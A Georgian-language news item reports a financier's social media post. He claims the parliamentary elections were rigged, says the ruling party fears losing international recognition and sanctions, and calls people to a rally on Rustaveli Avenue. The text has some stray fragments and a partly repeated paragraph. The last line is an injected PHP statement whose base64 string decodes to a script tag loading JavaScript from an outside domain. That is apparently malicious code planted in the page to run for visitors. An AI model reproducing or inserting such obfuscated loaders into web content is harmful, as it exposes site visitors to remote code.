celsiusi
ავერსი საქკაბელი

საერთაშორისო საზოგადოების მხრიდან არჩევნების ლეგიტიმურობის არ აღიარების შემთხვევაში ხელისუფლებას ძალაუფლება თავზე დაემხობა - ამის შესახებ სოციალურ ქსელში ფინანსისტი აკაკი ცომაია წერს. 

ცომაიას თქმით, სანამ საერთაშორისო ინსტიტუტები თავის საბოლოო დასკვნას დაწერენ, ჯერი ქართულ საზოგადოებაზეა და დღევანდელი შეკრება რუსთაველზე, 19:00 საათზე სწორედ ამ მიზანს ემსახურება. როგორია საქართველოს ამომრჩევლის აღქმა. გაუყალბეს თუ არა მას არჩევნები.

"რთულია, მაგრამ შევეცდები მოკლედ გაგიზიაროთ ჩემი აზრი.

- არჩევნების საერთაშორისო აღიარება ძალიან აღელვებს "ქართულ ოცნებას". მათ გარისკეს და ფიქრობენ, რომ საერთაშორისო აღიარებას მოიპოვებენ ისე, როგორც ეს შეძლეს მაგალითად, 2020-ში (და ეს ეხება სხვა წინა არჩევნებს და ხელისუფლებებს. მნიშვნელოვანი დარღვევებით, ლეგიტიმაციის ზღვარზე, ნუ მაგრამ ოკ, მოგვიწევს თქვენთან თანამშრომლობა). სხვა სიტყვებით, მათ ფსონი დადეს იმაზე, რომ ხელისუფლებასაც შეინარჩუნებენ და ბელორუსიზაციის გზასაც დადგებიან, რადგან ასეთია ქართველი ხალხის ნება. შესაბამისად, თავს დაიძვრენენ ფინანსური სანქციებიდან. საერთაშორისო ლეგიტიმაცია აღელვებთ იმიტომ, რომ სხვა შემთხვევაში, გარდაუვალი ფინანსური სანქციების წინაშე დგანან, რისიც დამიჯერეთ ძალიან, ძალიან ეშინიათ.

- არჩევნების შედეგები შოკი იყო ყველა ჩვენგანისთვის. მიმაჩნია, რომ არჩევნები გაყალბდა. მთავარი სათქმელი რომ სადმე არ ჩაიკარგოს, დეტალებში არ შევალ. მხოლოდ იმას ვიტყვი, რომ ქართული სადამკვირვებლო მისიების მტკიცებით, გაყალბების მასშტაბმა გავლენა მოახდინა არჩევნების შედეგზე. საქართველოს პრეზიდენტმა, როგორც ინსტიტუტმა, ეს დაადასტურა და მეტიც, საერთაშორისო საზოგადოებას მოუწოდა, რომ არ აღიარონ "ძალაუფლება" (მისი სიტყვებით, და არა ხელისუფლება) და გვერდში დაუდგნენ საქართველოს მოქალაქეებს. იგივე თქვეს ბარიერგადალახულმა ოპოზიციურმა პარტიებმა. არ დაგავიწყდეთ, რომ ბიძინას სურს ყველა ამ ადამიანის დაჭერა და გასამართლება პრეზიდენტის ჩათვლით და ეს არაერთხელ გვაუწყა როგორც თავად, ისე მისი თოჯინების მეშვეობით.

სხვა არჩევნებისგან განსხვავებით, ევროკავშირი და აშშ თავს იკავებს და ჯერჯერობით არ ულოცავს ამათ არჩევნებში გამარჯვებას ჯერი ქართულ საზოგადოებაზეა და დღევანდელი შეკრება რუსთაველზე, 19:00 საათზე სწორედ ამ მიზანს ემსახურება. როგორია საქართველოს ამომრჩევლის აღქმა. გაუყალბეს თუ არა მას არჩევნები. თითოეულს გარშემო გვაქვს ჩვენი გარემო (community), გვყავს ნათესავები, მეგობრები, თანამშრომლები, ფბ ბაბლი და ა.შ. ბევრი ადამიანი აკვირდებოდა არჩევნებს.

- რამდენად სჯერა თითოეულ ჩვენგანს, რომ საზოგადოების უმრავლესობა ქოცია? ეს ჩემთვისაც მნიშვნელოვანია, რადგან თუ საზოგადოების უმრავლესობა მართლაც ქოცებს უჭერს მხარს, არ მინდა, რაიმე საერთო მქონდეს მათთან, მივდივარ ემიგრაციაში. აქ არაფერი კარგი არ მოხდება და ყველაფერი უნდა გავაკეთო იმისთვის, რომ ჩემს შვილებს მივცე კარგი მომავლის და არა ჭაობში ცხოვრების შესაძლებლობა. ხოლო, თუ ჩვენი აღქმა სხვანაირია (და ამ წუთისთვის, ჩემი აღქმაც ესაა), რომ არჩევნები მოგვპარეს, მაშინ 3 ვარიანტია: ბრძოლა, ემიგრაცია, შეგუება. შეეგუოს ვისაც უნდა. ჩემი აღქმით, აწი, არსებობა მხოლოდ იმაზე იქნება დამოკიდებული, რამდენად უკეთესად შეძლებ ბიძინის გულის მოგებას. წარმატებას ვუსურვებ ყველას, ვინც ამ გზას აირჩევს. ამ გზას მე ვერ ავირჩევ და მხოლოდ პირველ ორ ვარიანტს განვიხილავ. გადაწყვეტილება ბრძოლის გაგრძელებაზე შემდეგ ფაქტორებზეა დამოკიდებული:

- ჩემი სტრატეგია დამოკიდებულია ჩემს მოლოდინზე თქვენს მიმართ, თუ რა სტრატეგიას აირჩევთ თქვენ. ისევე, როგორც თქვენი სტრატეგია დამოკიდებულია თქვენს მოლოდინზე, იმასთან დაკავშირებით, თუ რას გავაკეთებ მე. წონასწორობა ან ფასი (ნეშის, საბაზრო, საზოგადოების, შეთანხმება ... ) დგება სწორედ ამ მოლოდინების მიხედვით. ზუსტად ამ მოლოდინებზე დაყრდნობით შეიმუშავებს საკუთარ სტრატეგიას ევროკავშირი და აშშ ქართული ოცნების მიმართ.- და დამიჯერეთ, თუ საერთაშორისო საზოგადოება ამ არჩევნებს არ აღიარებს, ძალაუფლება თავზე ჩამოენგრევათ. ეს ზუსტად ვიცი", - წერს ცომაია სოციალურ ქსელში.

103
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");